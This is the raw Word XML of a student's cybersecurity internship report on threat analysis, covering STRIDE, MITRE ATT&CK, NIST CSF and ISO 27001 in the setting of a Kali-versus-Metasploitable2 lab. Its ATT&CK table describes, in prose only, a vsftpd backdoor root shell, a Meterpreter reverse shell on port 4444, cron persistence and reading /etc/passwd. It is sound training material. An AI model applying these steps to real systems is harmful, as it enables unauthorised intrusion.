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342B" w14:textId="77777777" w:rsidR="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E01F80" w14:textId="77777777" w:rsidR="006C5E01" w:rsidRDefault="006C5E01" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="183809BA" w14:textId="77777777" w:rsidR="006C5E01" w:rsidRDefault="006C5E01" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A0C642" w14:textId="77777777" w:rsidR="006C5E01" w:rsidRDefault="006C5E01" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="577A0C92" w14:textId="77777777" w:rsidR="006C5E01" w:rsidRDefault="006C5E01" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E95AAB3" w14:textId="77777777" w:rsidR="006C5E01" w:rsidRDefault="006C5E01" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F31164" w14:textId="77777777" w:rsidR="006C5E01" w:rsidRDefault="006C5E01" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11D6CF9F" w14:textId="77777777" w:rsidR="006C5E01" w:rsidRDefault="006C5E01" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D566287" w14:textId="77777777" w:rsidR="006C5E01" w:rsidRDefault="006C5E01" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1FB63F0E" w14:textId="77777777" w:rsidR="006C5E01" w:rsidRDefault="006C5E01" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15119CBD" w14:textId="77777777" w:rsidR="006C5E01" w:rsidRPr="006C5E01" w:rsidRDefault="006C5E01" w:rsidP="006C5E01">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="416A0C65" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C5E01" w:rsidRDefault="006C6527" w:rsidP="006C5E01">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C5E01">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>CyArt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C5E01">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cybersecurity Internship</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6A6712" w14:textId="215036A8" w:rsidR="006C6527" w:rsidRPr="00F03C65" w:rsidRDefault="006C6527" w:rsidP="006C5E01">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F03C65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Week 2 : Advanced Threat Analysis &amp; Incident Response</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3900D1FD" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="00F03C65" w:rsidRDefault="006C6527" w:rsidP="006C5E01">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F03C65">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Submitted by: Aman Gour</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F84B671" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="00F03C65" w:rsidRDefault="006C6527" w:rsidP="006C5E01">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F03C65">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>B.Tech</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F03C65">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Cybersecurity | SVIT, Hyderabad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5157FD98" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C5E01">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Date: May 29, 2026</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37A88377" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C5E01">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Supervisor: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>CyArt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> Security Team</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C83E80" w14:textId="77777777" w:rsidR="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C5E01">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25E8D3DF" w14:textId="77777777" w:rsidR="00F03C65" w:rsidRPr="00F03C65" w:rsidRDefault="00F03C65" w:rsidP="006C5E01">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A44C2EC" w14:textId="77777777" w:rsidR="00F03C65" w:rsidRPr="00F03C65" w:rsidRDefault="006C6527" w:rsidP="006C5E01">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F03C65">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Lab Environment: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B129F46" w14:textId="6AF6C20E" w:rsidR="006C6527" w:rsidRPr="00F03C65" w:rsidRDefault="006C6527" w:rsidP="006C5E01">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F03C65">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Kali Linux 10.0.2.15 (Attacker) | Metasploitable2 10.0.2.3 (Target) | NAT Network</w:t>
      </w:r>
      <w:r w:rsidR="00F03C65" w:rsidRPr="00F03C65">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B68E666" w14:textId="77777777" w:rsidR="006C5E01" w:rsidRDefault="006C5E01" w:rsidP="006C5E01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7475140C" w14:textId="61BAEED2" w:rsidR="006C6527" w:rsidRPr="00F03C65" w:rsidRDefault="006C6527" w:rsidP="00F03C65">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F03C65">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PART 1: THEORETICAL KNOWLEDGE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8F0579" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BD1C932" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="00F03C65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>1.1 Advanced Threat Analysis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A2085FD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 xml:space="preserve">1.1.1 Threat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Modeling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> — STRIDE Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC11A71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Threat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>modeling</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the systematic process of identifying, categorizing, and mitigating threats before they can be exploited. The STRIDE framework, developed by Microsoft, provides six threat categories that security professionals use to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack surfaces across systems, applications, and networks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17205199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637"/>
        <w:gridCol w:w="2365"/>
        <w:gridCol w:w="2389"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="1AB4C97A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7077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STRIDE Category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6328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9C434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DA80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Mitigation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="119FD02B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1FD2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Spoofing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88A1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Attacker impersonates a user or system to gain unauthorized access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7846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Forging login credentials to access </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>an</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> admin panel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F45A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Multi-factor authentication, digital certificates</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="7263B4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1B37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Tampering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E149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Unauthorized modification of data in transit or at rest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918E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Man-in-the-middle attack altering HTTP request parameters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D68A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Data integrity checks, TLS encryption, code signing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="109D98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3394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Repudiation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9643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Denial of performing an action without ability to prove otherwise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72CF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Attacker deletes log files after compromise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59B8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Audit logging, non-repudiation mechanisms, SIEM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="2C78376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F117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Information Disclosure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CA86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Exposure of sensitive information to unauthorized parties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5C33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SQL injection leaking user credentials from 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F3DF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Encryption at rest, access controls, data masking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="353924E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1E64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Denial of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CD75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Disruption of legitimate service availability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D67F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SYN flood attack exhausting server connection table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9C0D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Rate limiting, DDoS protection, load balancing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="1709F1C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A399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Elevation of Privilege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0371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Gaining unauthorized higher-level access rights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F24A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Exploiting </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> backdoor to gain root shell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F1CA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Principle of least privilege, patch management</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="738E30D8" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30F4B379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1.1.2 MITRE ATT&amp;CK Framework</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3695FD1A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The MITRE ATT&amp;CK (Adversarial Tactics, Techniques, and Common Knowledge) framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. It is organized into 14 tactics representing the phases of an attack lifecycle.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331BA79C" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46F9EB5B" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Key Tactics and Relevant Techniques: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864"/>
        <w:gridCol w:w="2477"/>
        <w:gridCol w:w="3868"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="56BD4FBF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6DA2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Tactic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CBB3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67F0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4E25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Relevance to Lab</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="509231FE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9282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Initial Access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745B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T1190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AC25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Exploit Public-Facing Application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D7DDD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vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> 2.3.4 backdoor exploitation on Metasploitable2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="34B0FB7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4CBA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Execution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541C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T1059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911B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Command and Scripting Interpreter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84EB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Shell commands executed post-exploitation (</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>whoami</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>, id, ls)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="14B4D01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C633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Persistence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7246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T1053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C3AB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Scheduled Task/Job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55A4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Maintaining access via </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> jobs on compromised host</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="616DA00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0306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Discovery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E2A7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T1046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0476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Network Service Scanning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F7C3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Nmap scanning of 10.0.2.3 for open ports and services</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="46C3690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1EA8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Lateral Movement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F857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06EE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Remote Services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AE51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SSH/FTP-based movement between compromised systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="26CF467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17BA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Collection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07E8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3770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Data from Local System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A544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Accessing /etc/passwd and sensitive files post-exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="5D44E7E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F0F9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Command &amp; Control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5488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T1571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0BC48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Non-Standard Port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00B7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Reverse shell on port 4444 via Meterpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="5C64177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1D65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Impact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9D69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T1489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A8E7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Service Stop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9224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Ability to stop services after gaining root access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="06E41F40" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="788F7B84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1.1.3 Advanced Attack Vectors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338269AB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Advanced Persistent Threats (APTs): APTs are sophisticated, long-term cyberattacks typically sponsored by nation-states or organized criminal groups. They target high-value organizations across government, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>defense</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>, and critical infrastructure. APTs operate in phases — initial compromise, lateral movement, data exfiltration — while evading detection for extended periods. Notable examples include APT29 (Cozy Bear) and APT41.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1CA28F" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3E950ED5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Supply Chain Attacks: Supply chain attacks compromise software or hardware vendors to inject malicious code into trusted products before delivery to end users. The 2020 SolarWinds attack exemplifies this — attackers inserted a backdoor (SUNBURST) into SolarWinds Orion software updates, compromising 18,000+ organizations including US government agencies. The attack mapped to MITRE T1195 (Supply Chain Compromise) and T1059 (Command and Scripting Interpreter).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7766D4C5" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EFD9023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Zero-Day Exploits: Zero-day vulnerabilities are previously unknown flaws in software for which no patch exists. Attackers exploit these before vendors can develop fixes. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4 backdoor exploited in this lab (CVE-2011-2523) is a classic example of a backdoor planted in software source code, discovered after release.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208F713F" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39F85242" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="00F03C65">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>1.2 Security Frameworks In Depth</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067875B0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1.2.1 NIST Cybersecurity Framework (CSF)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56478DE5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The NIST CSF provides a policy framework of computer security guidance for private sector organizations to assess and improve their ability to prevent, detect, and respond to cyberattacks. It is organized around five core functions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121B636F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833"/>
        <w:gridCol w:w="2242"/>
        <w:gridCol w:w="2764"/>
      </w:tblGrid>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="006B592A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C2599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4B00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Key Activities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1EE2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Example Control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9764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Lab Application</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="5973BEF5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84BF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Identify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6326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Asset inventory, risk assessment, governance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91E5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ID.AM-1: Physical devices inventoried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E655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Nmap scan identifies services on Metasploitable2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="606055C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1A7D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Protect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130C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Access controls, encryption, security training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959A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PR.AC-1: Identities and credentials managed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10BD8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 xml:space="preserve"> firewall rules block attacker IP 10.0.2.15</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="00538C3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88EB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Detect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8A66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Anomaly detection, continuous monitoring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48AA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DE.CM-1: Network monitoring performed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8A661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 HIDS detects port changes and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> activity</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="20C0699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6DD9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Respond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ED75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Incident handling, communications, analysis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93B9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RS.RP-1: Response plan executed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0E9A6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 xml:space="preserve"> bans attacker IP; alerts documented</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006C6527" w:rsidRPr="006C6527" w14:paraId="54FF8A4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E6E2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Recover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410B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Recovery planning, improvements, communications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28B8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RC.RP-1: Recovery plan executed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ECF3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Restore services, patch </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>vsftpd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="006C6527">
              <w:rPr>
                <w:lang w:val="en-IN"/>
              </w:rPr>
              <w:t>, apply remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A67B853" w14:textId="77777777" w:rsidR="006C6527" w:rsidRPr="006C6527" w:rsidRDefault="006C6527" w:rsidP="006C6527">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12920895" w14:textId="77777777" w:rsidR="00F03C65" w:rsidRDefault="00F03C65">
      <w:pPr>
        <w:rPr>
          <w:color w:val="434343"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="28174AC1" w14:textId="0F6AE2F8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lastRenderedPageBreak/>
        <w:t>1.2.2 ISO 27001 Controls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209B9898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ISO/IEC 27001 is an international standard for information security management systems (ISMS). It defines 114 controls across 14 domains. Key controls relevant to this week's </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>practicals</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006C6527">
        <w:rPr>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve"> include:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180B9549" w14:textId="77777777" w:rsidR="00F03C65" w:rsidRPr="006C6527" w:rsidRDefault="00F03C65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989"/>
        <w:gridCol w:w="2891"/>
        <w:gridCol w:w="2995"/>
      </w:tblGrid>
